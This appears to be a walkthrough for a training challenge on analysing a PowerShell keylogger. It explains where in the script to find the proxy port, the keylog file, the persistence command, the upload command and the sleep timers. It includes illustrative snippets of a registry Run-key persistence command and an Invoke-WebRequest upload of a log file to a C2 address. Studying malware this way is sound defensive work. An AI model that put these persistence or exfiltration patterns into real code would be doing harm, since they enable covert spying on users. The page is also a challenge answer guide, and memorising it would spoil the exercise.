Back to Walkthroughs
PowerShell Keylogger
Let's Defend Malware Analysis [Easy]Easy

PowerShell Keylogger

#tutorial

Challenge Description

image image

Solution and Analysis

This guide provides a structured approach to analyzing the malware script and finding the answers to the provided questions. Each section details the methodology for locating the relevant information within the code.

Question 1: What is the proxy port used by the script?

  • Methodology: Configuration settings like IP addresses, ports, or domains are often declared as variables at the beginning of a script for easy modification. Look for a variable assignment that clearly defines a port number for a proxy connection.
  • Location: As indicated, check near line 5.
  • Expected Answer: A numerical value (e.g., 8080, 4444) assigned to a variable like $proxyPort or PROXY_PORT.

Question 2: What function/method is used for starting keylogging?

  • Methodology: The script will have a specific function or method call that initiates the keylogging thread or loop. Search for function definitions or calls with names related to logging, capturing keys, or starting a hook.
  • Location: Check the code around line 81.
  • Expected Answer: The name of the function or method being invoked, such as Start-Keylogger, begin_logging(), or a similar identifier.

Question 3: What is the name of the file used by the script to store the keylog data?

  • Methodology: Keystrokes are typically logged to a temporary file on the victim's machine before being exfiltrated. Find the part of the code that handles file I/O (writing to a file) and identify the variable holding the filename.
  • Location: Examine the logic near line 134.
  • Expected Answer: A filename string defined in the code, for example, "log.txt", "%TEMP%\dat.tmp", or "keystrokes.log".

Question 4: What command is used by the script to achieve persistence?

  • Methodology: Persistence allows malware to survive a system reboot. Common techniques in Windows include creating a Run key in the registry, a scheduled task, or placing a file in the Startup folder. Look for commands that interact with the Windows Registry (reg add, Set-ItemProperty) or the Task Scheduler (schtasks).
  • Location: The persistence mechanism can be found near line 245.
  • Expected Answer: The full command line used to establish persistence, such as reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "...".

Question 5: What is the command used by the script to upload data?

  • Methodology: Data exfiltration is the process of sending collected data (like keylogs) to a command-and-control (C2) server. Look for functions or commands related to making network requests, such as Invoke-WebRequest, Start-BitsTransfer, or methods from a networking library.
  • Location: The data upload logic is located around line 215.
  • Expected Answer: The function or command used for the network transfer, like Invoke-WebRequest -Uri $c2_url -Method POST -InFile $log_file.

Question 6: What is the regex used by the script to filter IP addresses?

  • Methodology: To find a specific pattern in text, scripts use Regular Expressions (Regex). Search the code for a string that matches the typical format of an IP address regex pattern. Common indicators include \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} or keywords like -match, re.compile, or Regex.
  • Location: This may not have a fixed line number. Search the entire script for patterns resembling an IP address format.
  • Expected Answer: The regex pattern string itself, for example: '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'.

Question 7 & 9: What is the DLL imported by the script to call keylogging APIs?

  • Methodology: High-level scripts (like PowerShell or Python) often need to call low-level Windows API functions to perform actions like keylogging. These functions are located in system DLLs. Look for code that imports or loads a DLL, particularly one related to user input. The user32.dll is the most common for this purpose, as it contains functions like GetAsyncKeyState and GetForegroundWindow.
  • Location: The DLL import statement can be found around line 99.
  • Expected Answer: The name of the DLL file, which is most likely "user32.dll".

Question 8: How many seconds does the script wait before re-establishing a connection?

  • Methodology: This refers to the standard delay or "sleep" interval within the main communication loop of the malware. This is done to reduce network noise and CPU usage. Look for a Start-Sleep, sleep(), or Task.Delay command inside the primary loop that communicates with the C2 server.
  • Location: This timer is set near line 86.
  • Expected Answer: A numerical value representing the sleep time in seconds (e.g., 60, 300).

Question 10: How many seconds does the script wait after failing to establish a connection?

  • Methodology: This is different from the standard loop timer. It's an error-handling feature. When a connection to the C2 server fails, the script will wait a specific amount of time before trying again. Look for a Start-Sleep or equivalent command inside a catch or except block that handles network connection errors.
  • Location: This specific error-handling timer is located at line 276.
  • Expected Answer: A numerical value representing the sleep time in seconds after a connection failure.